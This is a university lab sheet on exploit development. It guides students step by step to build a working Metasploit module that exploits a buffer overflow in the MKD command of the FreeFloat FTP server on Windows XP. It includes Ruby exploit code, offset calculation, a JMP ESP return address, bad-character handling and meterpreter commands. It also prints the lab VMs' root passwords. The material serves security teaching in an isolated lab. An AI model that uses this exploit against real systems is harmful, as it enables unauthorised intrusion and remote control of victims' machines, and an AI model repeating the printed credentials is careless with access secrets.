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Exploit Development

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Exploit Development


This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons
Attribution-ShareAlike 3.0 Unported License.

All included software source code is by Z. Cliffe Schreuders and is also licensed under the GNU General Public
License, either version 3 of the License, or (at your option) any later version.

General notes about the labs


Introduction to exploit development

Getting started

Manual exploitation

Writing your first MSF exploit module

Finding the offset

Adding shellcode

Getting to the shellcode

Getting it working

Finishing touches



General notes about the labs

Often the lab instructions are intentionally open ended, and you will have to figure
some things out for yourselves. This module is designed to be challenging, as well as

However, we aim to provide a well planned and fluent experience. If you notice any
mistakes in the lab instructions or you feel some important information is missing,
please feel free to add a comment to the document by highlighting the text and click
the comment icon ( ), and I (Cliffe) will try to address any issues. Note that your
comments are public.

The labs are written to be informative and, in order to aid clarity, instructions that you
should actually execute are generally written in this colour. Note that all lab content is
assessable for the module, but the colour coding may help you skip to the “next thing
to do”, but make sure you dedicate time to read and understand everything. Coloured
instructions in italics indicates you need to change the instructions based on your
environment: for example, using your own IP address.

You should maintain a lab logbook / document, which should include your answers
to the questions posed throughout the labs (in this colour).

As with all of the labs in this module, start by loading the latest version of the LinuxZ
template from the IMS system. If you have access to this lab sheet, you can read
ahead while you wait for the image to load.

To load the image: press F12 during startup (on the boot screen) to access
the IMS system, then login to IMS using your university password. Load the
template image: LinuxZ (load the latest version).

Once your LinuxZ image has loaded, log in using the username and password
allocated to you by your tutor.

The root password -- which should NOT be used to log in graphically -- is

“tiaspbiqe2r” (this is a secure password but is quite easy 2 remember). Again, never
log in to the desktop environment using the root account -- that is bad practice, and
should always be avoided.

Using the VM download script (as described in a previous lab), download and start
these VMs:

● Kali Linux (Bridged and Host Only)

username:root password:toor
● Windows XP - bridged with network share

Introduction to exploit development

By the end of this lab you will have written a Metasploit exploit module to compromise
a remote buffer overflow.

The exploit you are going to write is not currently in Metasploit’s arsenal, and the MSF
example on ExploitDB does not work with the WinXP service pack you will use. So what
you are creating is somewhat unique!

Getting started
On the Windows XP VM (victim/debugger)

Download these files (also available via the network share in Z:\Software & VM &

OllyDbg, a graphical debugger: http://www.ollydbg.de/odbg110.zip

FreeFloat, a vulnerable (but real) FTP server: http://www.exploit-db.com/wp-


Copy each of these zip files to My Documents, and extract them to their own

Start OllyDbg (by running OLLYDBG.exe), click Open, and select the Win32 FloatFTP
server executable.
Starting the debugger, by opening the program to debug

OllyDBG is similar to GNU GDB, which you have used previously, except that it is a
graphical program (a similar program for Linux is EDB -- both are available in Kali
Linux). Note that the Assembly instructions are displayed in a slightly different format
(AT&T vs Intel syntax).

OllyDbg debugger poised and ready to go

Also, note that the registers are visible (top right), and that the EIP is pointing to the
FTPServe entry point, since the program is not yet running. Top left are the assembly
instructions, the stack is visible at the bottom right.

At this point you may wish to move your Windows VM onto the host-only network, and
renew your IP address, so others on the network can’t interfere.

Note the IP address of your Windows VM.

Press the Start icon ( ) in OllyDbg.

If you are prompted by the Windows firewall, allow the server access to the network
(click “Unblock”).

Allow the server network access

Manual exploitation
On the Kali Linux VM (attacker/exploit development)

First, manually test the vulnerability, by connecting directly to the vulnerable server
using Ncat:

ncat IP-address FTP-port

Authenticate as an anonymous user:

USER anonymous
PASS anonymous

Manual exploitation

Note that FloatFTP has a buffer overflow when a MDK command is followed by a long

Did you discover this vulnerability during the bug hunting lab?

Cause a buffer overflow…

Run MKD followed by a few lines of ‘A’s (at least 5 lines or so), then press Enter:


On the Windows XP VM (victim/debugger)

Manual exploitation crashing the program (the screenshot is cropped, so doesn't show the whole input)

OllyDdg will report an “access violation” (at the bottom in the status bar), and pause
the process.

Tip: if it doesn’t, you may not have entered a long enough input.

What is the value of EIP? Why is this interesting / good news?

Writing your first MSF exploit module
On the Kali Linux VM (attacker/exploit development)

Create a Metasploit exploit module, and save it as FreeFloatMDKoverflow.rb in /


Hint: to make the directory path, you can run “mkdir -p /root/.msf4/modules/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Ftp
def initialize(info = {})

'Name' => 'FloatFTP MKD overflow',
'Description' => 'My first MSF exploit module',
'Author' => [ 'Your name'],
'Version' => '$Revision: 1 $',
'Platform' => ['win'],
'Targets' => [ [ 'Windows XP SP2', { } ],],
'DefaultTarget' => 0,
'License' => GPL_LICENSE


def exploit
puts "My first Metasploit module!"

bad = "A" * 1000

send_cmd( ['MKD', bad] , false )


Note that MSF simplifies our code already, since it does the FTP authentication for
us. This code is Ruby, although you do not need to be overly familiar with the Ruby
programming language in order to develop exploits.

On the Windows XP VM (victim/debugger)

Reopen the program and restart the service in OllyDBG.

On the Kali Linux VM (attacker/exploit development)

Start msfconsole, and launch your new exploit:


msf > use exploit/windows/ftp/FreeFloatMDKoverflow

msf (FreeFloatMDKoverflow) > set RHOST IP-address

msf (FreeFloatMDKoverflow) > exploit

If there is a problem loading your new exploit, scroll up in msfconsole’s output to

read any error messages, then fix any code mistakes and restart msfconsole and try
the above again.

On the Windows XP VM (victim/debugger)

If things go well, you will have changed EIP to 0x41414141 (AAAA), and caused an
access violation.
OllyDbg access violation shown in the status bar

Finding the offset

On the Kali Linux VM (attacker/exploit development)

Your next step is to determine the offset within the input that overwrites the EIP: just
how many As would it take to overwrite EIP?

There are many ways you could determine the offset, one of which is to use
Metasploit’s pattern_create feature.

Edit the above code, so that bad is set to “pattern_create(1000)”, rather than a
sequence of As.

This generates a special pattern that can be used to calculate the offset, based on
having any section of the pattern. Your exploit will now generate the special pattern
and send it as the malicious input to the program. The aim is to use this pattern to
calculate the length of the offset before the EIP overwrite occurs.

On the Windows XP VM (victim/debugger)

Restart the service in OllyDBG.

On the Kali Linux VM (attacker/exploit development)

Restart msfconsole, and launch your updated exploit:


msf > use exploit/windows/ftp/FreeFloatMDKoverflow

msf (FreeFloatMDKoverflow) > set RHOST IP-address

msf (FreeFloatMDKoverflow) > exploit

On the Windows XP VM (victim/debugger)

Note the new EIP address error.

OllyDbg access violation shown in the status bar

On the Kali Linux VM (attacker/exploit development)

Run the new EIP value through MSF’s pattern_offset tool:

EIP-value 1000

Record the EIP offset you have calculated.

So you now know the offset: the number of bytes from the start of the input, to the
part of the input that overwrites EIP.

Confirm this by updating your bad variable in the exploit code, so that it starts
with "A" * offset, then four Bs, then lots of Cs.

Hint: bad = "A" * offset + "BBBB" + "C" * 500

On the Windows XP VM (victim/debugger)

Restart your debugging

On the Kali Linux VM (attacker/exploit development)

Restart Metasploit, and rerun your exploit module.

On the Windows XP VM (victim/debugger)

If you have correctly overwritten exactly the EIP you will have written the value
0x42424242 (since 0x42 is hex for ASCII 66, which represents a B).

OllyDbg access violation shown in the status bar

Adding shellcode
Now that you can control execution of the vulnerable service, you need to decide
where to put the shellcode/payload. You could either place the shellcode before or
after the set of Bs representing your control of EIP, since you control both areas of

Browse the Register and Stack panes, and find the As, Bs, and Cs.

OllyDbg browsing input on the stack

Next,look to see if any of the registers are already pointing to the potential shellcode
areas. If so, you can jump directly to a register, which is an ideal situation (otherwise
you would need to find another way to jump to the shellcode).

Do you think the shellcode should be stored in the As section or the Cs section?
We have ESP and EDI both pointing somewhere in the Cs, which is good because there
also seems to be quite a bit of space for your shellcode. (Answer: so this is the a good
place to put your shellcode.)

On the Kali Linux VM (attacker/exploit development)

Add a payload to the Cs section:

Update bad to be:

bad = "A" * offset + "BBBB" + payload.encoded + "C" * 10

Getting to the shellcode

Finally, you need a new return address to replace “BBBB” that will land you in your

Since you may not know exactly where the pointer will land within the Cs, you can add
a NOP slide…

What is a NOP, and what is a NOP slide?

Update the bad variable to:

bad = "A" * offset + "BBBB" + "\x90" * 30 + payload.encoded

+ "C" * 10

Why can’t you just replace BBBB with the memory address that you can see the Cs
starting in OllyDb?

Part of the answer: you cannot simply write a memory address directly into that space,
since the memory addresses change each time the program runs. An alternative way
to get to your shellcode is to point EIP at an instruction within memory that jumps the
code to the ESP register.

On the Windows XP VM (victim/debugger)

To find such an instruction:

Restart the debugging of the FTP server.

Right click the instruction pane (top left), and Search for → Command.

Search for “JMP ESP”

If the command does not exist in the main program (it doesn’t in this case), you can
search through the shared libraries that the program uses for a JMP ESP instruction:

View (menu) → Executable Modules

When developing exploits it is often best to use return values that point to
libraries that ship with the program, rather than system libraries which may
change each Windows release. However, in this case there does not seem to be
any other choice.

Select a module of your choice

Try searching for “JMP ESP”

Once you have found one, make a note of the address.

Note: choose a return address that does not include 0x00, 0x0A, or 0x0D.

What return address have you found, and what library was it in?

For example, one solution is to search within shell32, and find the instruction at
0x7CA58265. However, you should try to find another one if you can.

Replace the “BBBB” in the exploit to a reversed (Little Endian) version of the return
address you have found. For example, 0x7CA58265 would become:

bad = "A" * offset + "\x65\x82\xA5\x7C" + "\x90" * 30 +

payload.encoded + "C" * 10

Why do you need to write the address “reversed” in the code?

On the Windows XP VM (victim/debugger)

Restart your debugging.

On the Kali Linux VM (attacker/exploit development)

Restart Metasploit, and rerun your exploit module.

On the Windows XP VM (victim/debugger)

The program crashes due to your payload including characters that get

Getting it working
For now, lets assume the typical set of bad characters applies in this case: 0x00, 0x0A,
and 0x0D.

On the Kali Linux VM (attacker/exploit development)

Update the module info at the start of the Metasploit exploit module, to include the

'Payload' => {'BadChars' => "\x00\x0a\x0d"},

OllyDbg access violation shown in the status bar

On the Windows XP VM (victim/debugger)

Restart your debugging

On the Kali Linux VM (attacker/exploit development)

Restart Metasploit, and rerun your exploit module.

This time the program terminates as soon as the exploit runs (rather than having an
access violation). This indicates that your exploit is not generating any errors, but is
causing the server to stop. This can be avoided by setting another Metasploit option.
Update the module info at the start of the Metasploit exploit module, to include the

'DefaultOptions' => {'EXITFUNC' => 'process'},

On the Windows XP VM (victim/debugger)

Restart your debugging

On the Kali Linux VM (attacker/exploit development)

Restart Metasploit, and rerun your exploit module.

At this point your exploit should now be fully working! You will end up with a
meterpreter shell on the Windows system! Horray!

If your exploit did not work, there may be a problem with your selected “JMP
ESP”; you may have used a library that is randomised via address-layout
randomisation (ASLR), so the layout the the code may change each time the
library is used. Try finding another return address, or use the example provided

Payload away!

Confirm you have access to the remote system by running:

meterpreter > getuid

meterpreter > ps

Finishing touches
Store the offset and return address with the Targets setting...

This line:

'Targets' => [ [ 'Windows XP SP2', { } ],],


'Targets' => [ [ 'Windows XP SP2', {'Offset' => XXX, ‘Ret’ => 0xXXXXXXXX } ],],

(Where you should replace the values with the ones you identified earlier.)

Replace the offset number within your code with:


Replace the return address within your code with:


Replace the ‘A’s and NOPs with a call to make_nops(number).

What is the difference between using 0x90 instructions verses using calls to
make_nops()? What is the advantage?

Remove the ‘C’s from the bad variable.

Test your changes: restart the debugger and msfconsole, and try re-running your

You could further improve the module by:

● Improve the description: include further information about the flaw

● Add to the author list with information about who first discovered this
vulnerability, when it was discovered, and who wrote this guide (always give
credit where it is due)
● Figure out what the maximum space there is for the payload and include this in
the Payload definition (look at other exploits for examples)
● Test for other possible bad characters, and update accordingly (Google will
come in handy here)
Read through your complete code, and ensure you understand the purpose of every

What defenses exist against buffer overflow stack smashing attacks?

Which of these would interfere with your exploit, how, and could you circumvent

● NX
● Stack pointer protection
● Access controls
● Firewalls

For further reading:

● Excellent exploitation development tutorial: https://www.corelan.be/index.php/

● OllyDbg Tricks for Exploit Development: http://resources.infosecinstitute.com/
● Exploit development tutorial with nice visualisations of the stack: http://
● Other exploits for the same vulnerability... you can learn from looking at other
example of the same attack:
○ Tutorial for a python exploit: http://www.fuzzysecurity.com/tutorials/
○ MSF exploit WinXP SP3: http://www.exploit-db.com/exploits/17540/
○ Ruby exploit WinXP SP3 Brazilian: http://www.exploit-db.com/exploits/

At this point you have:

● Manually crashed a program (again) by overwriting EIP

● Created a Metasploit exploit module that duplicates this

● Figured out how to overwrite EIP with anything of your choosing (by calculating
the offset from the start of the input to the value that is restored from the stack
to EIP)

● Pointed EIP at an instruction somewhere else in memory (the program’s code)

to get your shellcode running

● Written code to exploit the remote buffer overflow!

Well done!

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